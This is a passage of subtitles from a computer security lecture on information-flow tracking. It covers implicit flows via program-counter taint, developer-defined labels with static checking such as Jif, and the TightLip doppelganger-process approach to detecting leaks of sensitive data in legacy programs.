1269
01:01:23,130 --> 01:01:25,380
here and we can tell that
there's this implicit flow

1270
01:01:25,380 --> 01:01:28,470
here, because we know
that somehow to get here,

1271
01:01:28,470 --> 01:01:30,355
we had to look at
the sensitive data.

1272
01:01:30,355 --> 01:01:32,480
So what does that mean at
the implementation level?

1273
01:01:32,480 --> 01:01:33,979
That means that to
get here, there's

1274
01:01:33,979 --> 01:01:39,180
something about the PC that has
been tainted by sensitive data.

1275
01:01:39,180 --> 01:01:40,710
To say that we
have gotten here is

1276
01:01:40,710 --> 01:01:43,450
to say the PC has been
set to here or to here.

1277
01:01:43,450 --> 01:01:48,090
At a high level we could
imagine that the system would

1278
01:01:48,090 --> 01:01:49,860
do some analysis
and it would say

1279
01:01:49,860 --> 01:01:54,050
that at this point in the code,
the PC has no taint at all.

1280
01:01:54,050 --> 01:01:57,180
At this point, it gets
tainted somehow by the INEI,

1281
01:01:57,180 --> 01:02:01,820
and at this point here, it's
going to have that taint.

1282
01:02:01,820 --> 01:02:06,257
So what will end up happening
is that if x is a variable that

1283
01:02:06,257 --> 01:02:08,090
initially shows up with
no taint maybe we'll

1284
01:02:08,090 --> 01:02:09,675
say OK, at this
point, it's actually

1285
01:02:09,675 --> 01:02:11,800
going to give the taint of
the PC which is actually

1286
01:02:11,800 --> 01:02:13,450
going to taint it there.

1287
01:02:13,450 --> 01:02:15,787
So there's some sublety
here that I'm glossing over,

1288
01:02:15,787 --> 01:02:18,200
but at a high level that's
how you can capture some

1289
01:02:18,200 --> 01:02:20,450
of these flows here by
actually looking and seeing how

1290
01:02:20,450 --> 01:02:22,345
the PC is getting
set, and then trying

1291
01:02:22,345 --> 01:02:28,190
to propagate that to the
targets of these if statements.

1292
01:02:28,190 --> 01:02:30,390
Does that all makes sense?

1293
01:02:30,390 --> 01:02:30,940
OK.

1294
01:02:30,940 --> 01:02:32,648
And if you're interested
in learning more

1295
01:02:32,648 --> 01:02:36,005
about this, come talk to me,
there's been a lot of research

1296
01:02:36,005 --> 01:02:37,340
into this kind of stuff.

1297
01:02:37,340 --> 01:02:41,280
However, you can imagine that
the system I just described

1298
01:02:41,280 --> 01:02:44,750
may be too conservative
once again.

1299
01:02:44,750 --> 01:02:49,770
So imagine that instead
of having this code here,

1300
01:02:49,770 --> 01:02:51,980
this was also 0.

1301
01:02:51,980 --> 01:02:56,300
So in this dump case,
there's absolutely no reason

1302
01:02:56,300 --> 01:03:00,830
to taint x with anything
related to the INEI,

1303
01:03:00,830 --> 01:03:03,590
because you didn't actually
leak any information

1304
01:03:03,590 --> 01:03:04,995
in either of these branches.

1305
01:03:04,995 --> 01:03:09,780
But if you use it with a
naive PC tainting scheme,

1306
01:03:09,780 --> 01:03:16,580
then you might over-estimate
how much x has been tainted by.

1307
01:03:16,580 --> 01:03:18,730
So I should say there's
some subtlety you

1308
01:03:18,730 --> 01:03:21,380
can do to try to get around
some of these issues,

1309
01:03:21,380 --> 01:03:24,010
but it's a little bit tricky.

1310
01:03:24,010 --> 01:03:25,435
Does this all make sense?

1311
01:03:28,006 --> 01:03:28,505
All right.

1312
01:03:28,505 --> 01:03:29,373
AUDIENCE: Just a question.

1313
01:03:29,373 --> 01:03:30,339
PROFESSOR: Oh, sorry.

1314
01:03:30,339 --> 01:03:33,720
AUDIENCE: When you get out of
the if statement, so you're out

1315
01:03:33,720 --> 01:03:36,062
of the branch, do you
[INAUDIBLE] taint out?

1316
01:03:36,062 --> 01:03:37,520
PROFESSOR: Yeah,
so typically, yes.

1317
01:03:37,520 --> 01:03:40,640
So like down here the PC
taint would be cleared.

1318
01:03:40,640 --> 01:03:43,608
So it would only be set inside
these branch things here.

1319
01:03:43,608 --> 01:03:45,566
And the reason for that
is because essentially,

1320
01:03:45,566 --> 01:03:47,770
by the time you
get down here, you

1321
01:03:47,770 --> 01:03:49,686
get down here regardless
of what the INEI was.

1322
01:03:49,686 --> 01:03:51,114
So yeah, you clear that.

1323
01:03:51,114 --> 01:03:52,066
It's a good question.

1324
01:03:55,480 --> 01:03:55,980
Let's see.

1325
01:04:00,680 --> 01:04:03,860
You talked about how you
might be able to taint

1326
01:04:03,860 --> 01:04:07,450
at this very low level, even
though that might be expensive,

1327
01:04:07,450 --> 01:04:09,130
one reason why it
might be useful

1328
01:04:09,130 --> 01:04:10,705
is because it will
actually allow

1329
01:04:10,705 --> 01:04:12,680
you to do things like see what
your data lifetimes look like.

1330
01:04:12,680 --> 01:04:14,763
So a couple lectures ago,
we talked about the fact

1331
01:04:14,763 --> 01:04:16,990
that a lot of times
key data, for example,

1332
01:04:16,990 --> 01:04:19,365
will live in memory longer
than you think that it should.

1333
01:04:19,365 --> 01:04:24,612
So you can imagine that even
if some of the x86 or ARM level

1334
01:04:24,612 --> 01:04:27,059
taint tracking is
expensive, you can imagine

1335
01:04:27,059 --> 01:04:28,725
using it to form an
audit of your system

1336
01:04:28,725 --> 01:04:30,190
and actually
tainting, let's say,

1337
01:04:30,190 --> 01:04:32,415
some secret key that
the user entered,

1338
01:04:32,415 --> 01:04:34,980
and just seeing where that
goes throughout your system.

1339
01:04:34,980 --> 01:04:37,146
It's an offline analysis,
it's not facing customers,

1340
01:04:37,146 --> 01:04:38,380
so it's OK for it to be slow.

1341
01:04:38,380 --> 01:04:40,810
That might actually really
help you to figure out oh,

1342
01:04:40,810 --> 01:04:43,550
this data's getting into
the keyboard buffer,

1343
01:04:43,550 --> 01:04:46,240
it's getting into the x server,
it's getting to wherever.

1344
01:04:46,240 --> 01:04:49,240
So even if it's slow, that can
still be very, very useful.

1345
01:04:49,240 --> 01:04:54,180
So I just wanted to
mention that briefly.

1346
01:04:54,180 --> 01:04:57,290
One interesting thing
you might think about

1347
01:04:57,290 --> 01:05:01,010
is the fact that as I
mentioned, TaintDroid

1348
01:05:01,010 --> 01:05:06,490
is nice because it constrains
the universe of taint sources

1349
01:05:06,490 --> 01:05:08,090
and taint sinks.

1350
01:05:08,090 --> 01:05:10,090
But as the developer,
maybe you want to actually

1351
01:05:10,090 --> 01:05:17,895
explicitly assert some more fine
grain control over the labels

1352
01:05:17,895 --> 01:05:19,270
that your program
interacts with.

1353
01:05:19,270 --> 01:05:23,110
So now as a programmer, you
want to be able to say something

1354
01:05:23,110 --> 01:05:23,900
like this.

1355
01:05:23,900 --> 01:05:30,320
So you query some int, and
let's say we call it x,

1356
01:05:30,320 --> 01:05:34,320
then you associate
some label with it.

1357
01:05:34,320 --> 01:05:36,360
Maybe the name of this
label is that Alice

1358
01:05:36,360 --> 01:05:39,330
is the owner of
this data, but Alice

1359
01:05:39,330 --> 01:05:42,320
permits Bob, or something
labeled with Bob,

1360
01:05:42,320 --> 01:05:43,744
to be able to see that.

1361
01:05:43,744 --> 01:05:46,160
TaintDroid doesn't let you do
this, because it essentially

1362
01:05:46,160 --> 01:05:47,830
controls that
universe of labels.

1363
01:05:47,830 --> 01:05:49,534
But maybe as a
programmer you want

1364
01:05:49,534 --> 01:05:51,510
to be able to do
a thing like this.

1365
01:05:51,510 --> 01:05:56,770
You can imagine that your
program has various input

1366
01:05:56,770 --> 01:06:01,825
channels and output
channels, and all

1367
01:06:01,825 --> 01:06:03,898
of these input and
output channels,

1368
01:06:03,898 --> 01:06:06,310
they all have labels, too.

1369
01:06:06,310 --> 01:06:08,950
And these are labels
that you as a programmer

1370
01:06:08,950 --> 01:06:11,790
get to actually pick, as
opposed to the system itself

1371
01:06:11,790 --> 01:06:14,600
trying to say here's this
group of fine set of things.

1372
01:06:14,600 --> 01:06:23,620
So maybe say for input channels,
you know the read values,

1373
01:06:23,620 --> 01:06:25,450
maybe they get the
label of the channel.

1374
01:06:28,040 --> 01:06:33,777
That's very similar to how
TaintDroid works right now.

1375
01:06:33,777 --> 01:06:35,360
So if you read
something from the GPS,

1376
01:06:35,360 --> 01:06:37,359
that read value is the
taint of the GPS channel,

1377
01:06:37,359 --> 01:06:43,330
but now you as a programmer can
choose what those labels are.

1378
01:06:43,330 --> 01:06:47,590
And then you could imagine that
for output channels that label

1379
01:06:47,590 --> 01:06:59,834
will channel has to match some
label value we've written.

1380
01:07:05,020 --> 01:07:07,090
You can imagine other
policies here as well.

1381
01:07:07,090 --> 01:07:09,170
But the basic idea is
that there are actually

1382
01:07:09,170 --> 01:07:11,080
program managers that
allow you the developer

1383
01:07:11,080 --> 01:07:14,055
to pick what the
labels are and what

1384
01:07:14,055 --> 01:07:16,370
the semantics for
those labels can be.

1385
01:07:16,370 --> 01:07:19,346
So what's nice
about some of these

1386
01:07:19,346 --> 01:07:22,078
is they do require the
programmer to do a little bit

1387
01:07:22,078 --> 01:07:26,650
more work, but the
outcome of that work

1388
01:07:26,650 --> 01:07:30,100
is that static checking--
and by static checking

1389
01:07:30,100 --> 01:07:35,948
I mean checking that's
done at compile time--

1390
01:07:35,948 --> 01:07:42,530
can catch many types of
information flow bugs.

1391
01:07:42,530 --> 01:07:46,534
So if you're diligent about
labeling all of your network

1392
01:07:46,534 --> 01:07:49,861
channels and screen channels
with the appropriate

1393
01:07:49,861 --> 01:07:52,266
permissions, and you're
very diligent about leaving

1394
01:07:52,266 --> 01:07:54,090
your data like this,
what can happen

1395
01:07:54,090 --> 01:07:56,930
is that at compile time,
when you compile your program

1396
01:07:56,930 --> 01:07:59,077
and your compiler can
tell you things like hey,

1397
01:07:59,077 --> 01:08:01,160
if you were to run this
program, then you actually

1398
01:08:01,160 --> 01:08:05,150
have an information leak that
this particular piece of data

1399
01:08:05,150 --> 01:08:07,910
will pass an equal channel,
which is untrusted.

1400
01:08:07,910 --> 01:08:10,605
And at a high level, the
reason why static checking

1401
01:08:10,605 --> 01:08:13,910
can catch a lot of these bugs
is because usually speaking,

1402
01:08:13,910 --> 01:08:16,340
when you think of some
of these annotations,

1403
01:08:16,340 --> 01:08:18,580
they're somewhat
similar to types.

1404
01:08:18,580 --> 01:08:23,140
So the same way that
compilers can catch errors

1405
01:08:23,140 --> 01:08:25,362
involving types and
installing type language,

1406
01:08:25,362 --> 01:08:26,796
you can imagine
that the compiler

1407
01:08:26,796 --> 01:08:29,664
in a language like this
can codes some calculus

1408
01:08:29,664 --> 01:08:32,130
over this label,
and in many cases,

1409
01:08:32,130 --> 01:08:35,251
determine hey, if you would
actually run this program,

1410
01:08:35,251 --> 01:08:36,250
this would be a problem.

1411
01:08:36,250 --> 01:08:39,960
So you really need to fix
the way that the labels work,

1412
01:08:39,960 --> 01:08:42,140
maybe you need to explicitly
declassify something,

1413
01:08:42,140 --> 01:08:43,110
so on and so forth.

1414
01:08:43,110 --> 01:08:45,050
AUDIENCE: You can't
just [INAUDIBLE]?

1415
01:08:48,445 --> 01:08:51,020
PROFESSOR: Yeah,
yeah, that's right.

1416
01:08:51,020 --> 01:08:53,850
So depending on the
language, these labels

1417
01:08:53,850 --> 01:08:57,380
can associate people with IO
ports, all that kind of stuff.

1418
01:08:57,380 --> 01:08:59,533
That's exactly right.

1419
01:08:59,533 --> 01:09:02,949
So this is just
interesting to know about,

1420
01:09:02,949 --> 01:09:06,729
because TaintDroid has a very
nice general introduction

1421
01:09:06,729 --> 01:09:09,280
to this information flows
stuff, but there's actually

1422
01:09:09,280 --> 01:09:10,863
some really hardcore
systems out there

1423
01:09:10,863 --> 01:09:13,084
than can express
much richer semantics

1424
01:09:13,084 --> 01:09:17,500
in the control of a program with
respect to information flow.

1425
01:09:17,500 --> 01:09:20,180
And you know, too, that when
we talk about static checking

1426
01:09:20,180 --> 01:09:21,596
and being able to
catch many bugs,

1427
01:09:21,596 --> 01:09:24,406
it's actually preferable
to catch as many bugs using

1428
01:09:24,406 --> 01:09:27,507
static checking and
static failures as opposed

1429
01:09:27,507 --> 01:09:29,998
to dynamic checking
and dynamic failures.

1430
01:09:29,998 --> 01:09:31,706
There's a very subtle
but powerful reason

1431
01:09:31,706 --> 01:09:32,694
for why that is.

1432
01:09:32,694 --> 01:09:35,658
The reason is that,
let's say that we

1433
01:09:35,658 --> 01:09:38,375
defer all of the static
checks to the runtime, which

1434
01:09:38,375 --> 01:09:39,610
you could certainly do.

1435
01:09:39,610 --> 01:09:41,310
There's no reason you couldn't
take all the static checks

1436
01:09:41,310 --> 01:09:42,435
and give you a name for it.

1437
01:09:42,435 --> 01:09:45,770
The problem is that the failure
or success of these checks

1438
01:09:45,770 --> 01:09:48,359
is actually a covert
channel, perhaps.

1439
01:09:48,359 --> 01:09:50,065
So the attacker
could actually feed

1440
01:09:50,065 --> 01:09:52,090
your program some
information and then see

1441
01:09:52,090 --> 01:09:53,819
whether it crashed or not.

1442
01:09:53,819 --> 01:09:55,720
And if it crashed,
it might say, aha,

1443
01:09:55,720 --> 01:09:58,960
you've passed some dynamic
check of information flow, that

1444
01:09:58,960 --> 01:10:01,956
must mean something was
secret about this value I sort

1445
01:10:01,956 --> 01:10:03,800
of cajoled you into computing.

1446
01:10:03,800 --> 01:10:05,590
So you want to try
to make these checks

1447
01:10:05,590 --> 01:10:10,240
as static as possible to the
greatest possible extent.

1448
01:10:10,240 --> 01:10:14,480
If you want more information
on this kind of stuff, maybe

1449
01:10:14,480 --> 01:10:17,818
a good place to start,
a word to search is Jif.

1450
01:10:17,818 --> 01:10:20,041
It's a very
influential system that

1451
01:10:20,041 --> 01:10:23,746
built some of these issues
of label computation.

1452
01:10:23,746 --> 01:10:27,204
So you can start there
and sort of roll forward.

1453
01:10:27,204 --> 01:10:29,674
My co-professor actually
has done a lot of good work

1454
01:10:29,674 --> 01:10:31,340
on this, so you could
ask him about that

1455
01:10:31,340 --> 01:10:34,614
if you want to talk
more label stuff.

1456
01:10:34,614 --> 01:10:38,090
That's sort of interesting
to know that TaintDroid

1457
01:10:38,090 --> 01:10:41,526
is actually fairly restrictive
in the expressiveness

1458
01:10:41,526 --> 01:10:44,560
of the labels it
allows you to look at.

1459
01:10:44,560 --> 01:10:46,143
There are systems
out there that allow

1460
01:10:46,143 --> 01:10:48,150
you to do more powerful stuff.

1461
01:10:51,610 --> 01:10:58,734
Finally, what I'd like to talk
about is what we can do if we

1462
01:10:58,734 --> 01:11:03,040
want to track information
flows in some of these legacy

1463
01:11:03,040 --> 01:11:08,670
programs, or through programs
that are written in C or C++

1464
01:11:08,670 --> 01:11:12,040
that don't have all the
fancy runtime support.

1465
01:11:12,040 --> 01:11:16,046
So there's a very
cute system, some

1466
01:11:16,046 --> 01:11:20,620
of the same authors on this
paper that looks at this issue

1467
01:11:20,620 --> 01:11:24,160
of how can we track
informational leaks

1468
01:11:24,160 --> 01:11:28,143
in a system which we
don't want to modify

1469
01:11:28,143 --> 01:11:29,101
the application at all.

1470
01:11:29,101 --> 01:11:30,568
This is the TightLip system.

1471
01:11:30,568 --> 01:11:33,013
So the basic idea is
that they introduce

1472
01:11:33,013 --> 01:11:36,305
this notion of what they
call doppelganger processes.

1473
01:11:42,020 --> 01:11:44,200
TightLip uses doppelganger
processes evolved.

1474
01:11:44,200 --> 01:11:48,350
So the first thing it
does is it periodically

1475
01:11:48,350 --> 01:11:54,082
scans a user's
file system and it

1476
01:11:54,082 --> 01:11:57,690
looks for sensitive file types.

1477
01:11:57,690 --> 01:12:02,720
This might be things like your
mail file, your word processing

1478
01:12:02,720 --> 01:12:04,859
documents, so on and so forth.

1479
01:12:04,859 --> 01:12:07,025
So what it's going to do
for each one of these files

1480
01:12:07,025 --> 01:12:10,210
is it's going to produce
a scrubbed version.

1481
01:12:13,410 --> 01:12:16,060
So for example, if it
finds an email file,

1482
01:12:16,060 --> 01:12:22,002
it's going to replace the to
or the from information with,

1483
01:12:22,002 --> 01:12:25,986
let's say, a string of the same
length but just dummy data.

1484
01:12:25,986 --> 01:12:28,180
Maybe all spaces or
something like that.

1485
01:12:28,180 --> 01:12:32,308
It does this as a
background task.

1486
01:12:32,308 --> 01:12:36,772
Then the second thing it's going
to do, at some point a process

1487
01:12:36,772 --> 01:12:40,035
is going to start executing,
and so then TightLip

1488
01:12:40,035 --> 01:12:48,200
is going to detect when
and if the process tries

1489
01:12:48,200 --> 01:12:49,605
to access a sensitive file.

1490
01:12:52,510 --> 01:12:57,220
And if such an access
does take place,

1491
01:12:57,220 --> 01:13:01,986
TightLip is going to spawn
one of these doppelganger

1492
01:13:01,986 --> 01:13:02,485
processes.

1493
01:13:05,520 --> 01:13:09,500
And so what the
doppelganger process

1494
01:13:09,500 --> 01:13:14,896
looks like is very similar
to the original process that

1495
01:13:14,896 --> 01:13:16,760
tried to touch that
sensitive data,

1496
01:13:16,760 --> 01:13:21,786
but the key difference is
that the doppelganger, which

1497
01:13:21,786 --> 01:13:27,460
I'll abbreviate DG,
reads the scrubbed data.

1498
01:13:31,180 --> 01:13:34,460
So imagine that-- so the
process is executing,

1499
01:13:34,460 --> 01:13:36,900
it tries to access
your email file.

1500
01:13:36,900 --> 01:13:39,500
The system spawns this new
process, the doppelganger,

1501
01:13:39,500 --> 01:13:42,769
that doppelganger is exactly
the same as that original one,

1502
01:13:42,769 --> 01:13:44,810
but it is now reading from
the scrub data instead

1503
01:13:44,810 --> 01:13:46,122
of the real sensitive data.

1504
01:13:48,760 --> 01:13:51,458
What happens then.

1505
01:13:51,458 --> 01:13:54,963
Essentially,
TightLip, we're going

1506
01:13:54,963 --> 01:14:01,020
to run those two
processes in parallel.

1507
01:14:01,020 --> 01:14:05,620
It needs to just watch
them and see what they do.

1508
01:14:05,620 --> 01:14:09,842
And so in particular,
we're going to see,

1509
01:14:09,842 --> 01:14:21,330
do the processes issue
the same system calls

1510
01:14:21,330 --> 01:14:23,708
with the same arguments.

1511
01:14:28,050 --> 01:14:34,795
And if that's the case, then
presumably those system calls

1512
01:14:34,795 --> 01:14:38,610
do not depend on
the sensitive data.

1513
01:14:38,610 --> 01:14:41,410
So in other words, if
I start a process that

1514
01:14:41,410 --> 01:14:43,160
tries to open some
sensitive file,

1515
01:14:43,160 --> 01:14:46,390
I feed it basically junk
data, I let it execute.

1516
01:14:46,390 --> 01:14:49,860
If that doppelganger process
still does the same things

1517
01:14:49,860 --> 01:14:52,021
that the regular
process would have done,

1518
01:14:52,021 --> 01:14:53,520
then presumably it
wasn't influenced

1519
01:14:53,520 --> 01:14:56,550
by that sensitive data at all.

1520
01:14:56,550 --> 01:15:00,500
So essentially doppelganger
will let these processes run,

1521
01:15:00,500 --> 01:15:02,379
TightLip will let
these processes run,

1522
01:15:02,379 --> 01:15:03,920
and then check the
system calls here.

1523
01:15:03,920 --> 01:15:09,445
And then it might happen that in
some case the sys calls divert.

1524
01:15:13,530 --> 01:15:17,260
So in particular, what
if the doppelganger

1525
01:15:17,260 --> 01:15:21,004
starts doing things that the
regular version of the process

1526
01:15:21,004 --> 01:15:23,170
would not have done, and
then the doppelganger tries

1527
01:15:23,170 --> 01:15:24,800
to make a network call.

1528
01:15:24,800 --> 01:15:27,210
So just like in TaintDroid,
when that doppelganger tries

1529
01:15:27,210 --> 01:15:29,577
to make a network call,
that's when we say aha,

1530
01:15:29,577 --> 01:15:31,660
we should probably stop
what's happening right now

1531
01:15:31,660 --> 01:15:33,660
and then do something.

1532
01:15:33,660 --> 01:15:40,120
So if the system calls
diverge, then the doppelganger

1533
01:15:40,120 --> 01:15:47,540
makes a network call, then
we're going to do something.

1534
01:15:47,540 --> 01:15:50,980
So we're going to either
raise an alert to the user

1535
01:15:50,980 --> 01:15:52,737
or whatever.

1536
01:15:52,737 --> 01:15:54,670
Kind of like in TaintDroid,
but at this point

1537
01:15:54,670 --> 01:15:56,044
there's a specific
policy you can

1538
01:15:56,044 --> 01:15:58,520
add in some particular
system you're going to use.

1539
01:15:58,520 --> 01:16:00,728
But this is sort of an
interesting point at which you

1540
01:16:00,728 --> 01:16:05,140
can say well, somehow that
doppelganger process was

1541
01:16:05,140 --> 01:16:07,990
affected by that sensitive
data that was returned.

1542
01:16:07,990 --> 01:16:10,390
That means that maybe
if the user did not

1543
01:16:10,390 --> 01:16:12,597
think that a particular
process was going

1544
01:16:12,597 --> 01:16:14,680
to get exfiltrated data,
now the user can actually

1545
01:16:14,680 --> 01:16:16,940
do an audit of that
program to figure out

1546
01:16:16,940 --> 01:16:20,600
why that program returned send
that data over the network.

1547
01:16:20,600 --> 01:16:22,104
So does anyone-- go ahead.

1548
01:16:22,104 --> 01:16:23,992
AUDIENCE: So if you're
hitting something

1549
01:16:23,992 --> 01:16:26,706
like a word file or
whatever, you kind of

1550
01:16:26,706 --> 01:16:28,229
have to know what
you're zeroing out

1551
01:16:28,229 --> 01:16:29,427
and what you're [INAUDIBLE].

1552
01:16:32,593 --> 01:16:34,217
PROFESSOR: Good
question, that's right.

1553
01:16:34,217 --> 01:16:36,133
So I was going to
discuss some limitations,

1554
01:16:36,133 --> 01:16:38,008
and one of the limitations
is precisely that.

1555
01:16:38,008 --> 01:16:40,874
You need to have per
file type scrubbers.

1556
01:16:40,874 --> 01:16:42,746
So you can't just take
your email scrubber

1557
01:16:42,746 --> 01:16:44,380
and use it for Word.

1558
01:16:44,380 --> 01:16:47,860
And in fact, if those
scrubbers miss something,

1559
01:16:47,860 --> 01:16:50,670
so if they don't
redact everything,

1560
01:16:50,670 --> 01:16:53,719
then this system may not catch
all the possible sensitive data

1561
01:16:53,719 --> 01:16:54,360
leaks.

1562
01:16:54,360 --> 01:16:55,900
So you're exactly
right about that.

1563
01:16:55,900 --> 01:16:57,130
But I think-- go ahead.

1564
01:16:57,130 --> 01:17:00,450
AUDIENCE: So if
I understand, why

1565
01:17:00,450 --> 01:17:04,595
should the process look at the
data before saying go ahead?

1566
01:17:04,595 --> 01:17:07,000
Why wouldn't you just
send the stuff in?

1567
01:17:07,000 --> 01:17:09,240
PROFESSOR: Why
would the process--

1568
01:17:09,240 --> 01:17:12,740
AUDIENCE: If the process plans
to input data, [INAUDIBLE]?

1569
01:17:15,410 --> 01:17:17,870
PROFESSOR: Oh, no, no.

1570
01:17:17,870 --> 01:17:20,650
From the perspective
of the doppelganger,

1571
01:17:20,650 --> 01:17:22,335
I mean, it may try
to, in fact, look

1572
01:17:22,335 --> 01:17:24,747
and see things like does this
email address make sense,

1573
01:17:24,747 --> 01:17:26,580
for example, before it
tries to send it out.

1574
01:17:26,580 --> 01:17:28,330
But the doppelganger
process, it shouldn't

1575
01:17:28,330 --> 01:17:30,740
know that it's gotten
this weird scrubbed data.

1576
01:17:30,740 --> 01:17:32,010
So this gets back a
little bit to the question

1577
01:17:32,010 --> 01:17:33,134
we were just talking about.

1578
01:17:33,134 --> 01:17:37,620
If your scrubber
doesn't scrub things

1579
01:17:37,620 --> 01:17:39,790
in a semantically
reasonable way,

1580
01:17:39,790 --> 01:17:42,725
the doppelganger may, in
fact, crash, for example.

1581
01:17:42,725 --> 01:17:45,080
It expects things in this
sort of format, but it's not.

1582
01:17:45,080 --> 01:17:46,990
But at a high level,
the idea is that we're

1583
01:17:46,990 --> 01:17:51,330
trying to trick the doppelganger
into doing what it would do

1584
01:17:51,330 --> 01:17:54,690
normally, but on
data that's different

1585
01:17:54,690 --> 01:17:57,080
in the original version
and see if there

1586
01:17:57,080 --> 01:17:59,120
will be that divergence.

1587
01:17:59,120 --> 01:18:01,440
So one drawback is that,
like we're discussing,

1588
01:18:01,440 --> 01:18:04,410
this basically puts
the scrubbers in TCB

1589
01:18:04,410 --> 01:18:06,876
and if they don't work properly,
doppelgangers might crash,

1590
01:18:06,876 --> 01:18:09,410
you might not be able to
catch some violations, things

1591
01:18:09,410 --> 01:18:10,224
like that.

1592
01:18:10,224 --> 01:18:11,890
But the nice thing
about this is that it

1593
01:18:11,890 --> 01:18:14,362
works with legacy systems.

1594
01:18:14,362 --> 01:18:15,820
So we don't have
to change anything

1595
01:18:15,820 --> 01:18:17,680
about the application
itself runs.

1596
01:18:17,680 --> 01:18:21,950
We just have to make some fairly
minor changes to the OS kernel

1597
01:18:21,950 --> 01:18:25,020
to be able to track the
system call stuff, and then

1598
01:18:25,020 --> 01:18:26,420
things sort of work.

1599
01:18:26,420 --> 01:18:27,336
It's very, very nice.

1600
01:18:27,336 --> 01:18:29,210
And the overhead of the
system is essentially

1601
01:18:29,210 --> 01:18:31,810
the overhead of running an
additional process, which

1602
01:18:31,810 --> 01:18:34,734
is fairly low in a
modern operating system.

1603
01:18:34,734 --> 01:18:36,400
This is just sort of
a neat way to think

1604
01:18:36,400 --> 01:18:40,970
about how to do some type
of limited taint tracking

1605
01:18:40,970 --> 01:18:44,020
without doing heavyweight
changes to the runtime

1606
01:18:44,020 --> 01:18:46,165
without requiring changes
from the OS-- or sorry,

1607
01:18:46,165 --> 01:18:47,040
from the application.

1608
01:18:47,040 --> 01:18:49,490
AUDIENCE: Are we
only doing parallel

1609
01:18:49,490 --> 01:18:51,940
or waiting for each one?

1610
01:18:51,940 --> 01:18:54,125
Are we running both
processes and then

1611
01:18:54,125 --> 01:18:55,958
after that we can just
check that the system

1612
01:18:55,958 --> 01:18:56,350
calls are the same?

1613
01:18:56,350 --> 01:18:56,840
Like when do we check--

1614
01:18:56,840 --> 01:18:58,131
PROFESSOR: Yeah, two questions.

1615
01:18:58,131 --> 01:19:03,500
So as long as the doppelganger
process does things

1616
01:19:03,500 --> 01:19:06,800
that the OS can control and
keep on the local machine,

1617
01:19:06,800 --> 01:19:08,925
you can imagine running
the doppelganger process

1618
01:19:08,925 --> 01:19:10,120
and the regular one forward.

1619
01:19:10,120 --> 01:19:14,240
But as soon as the doppelganger
tries to affect external state,

1620
01:19:14,240 --> 01:19:16,200
so maybe the network
is doing this and that.

1621
01:19:16,200 --> 01:19:18,722
Maybe you can think of some
other linked sources like that.

1622
01:19:18,722 --> 01:19:20,180
Maybe there's
something like pipes,

1623
01:19:20,180 --> 01:19:22,471
for example, that the kernel
doesn't know how to create

1624
01:19:22,471 --> 01:19:23,670
doppelganger state for.

1625
01:19:23,670 --> 01:19:26,591
At that point you have to
stop it and then declare

1626
01:19:26,591 --> 01:19:27,841
success or victory, basically.

1627
01:19:30,930 --> 01:19:33,262
Any other questions?

1628
01:19:33,262 --> 01:19:35,220
All right, well, that's
the end of the lecture.

1629
01:19:35,220 --> 01:19:36,261
Have a good Thanksgiving.

1630
01:19:36,261 --> 01:19:38,080
See you next week.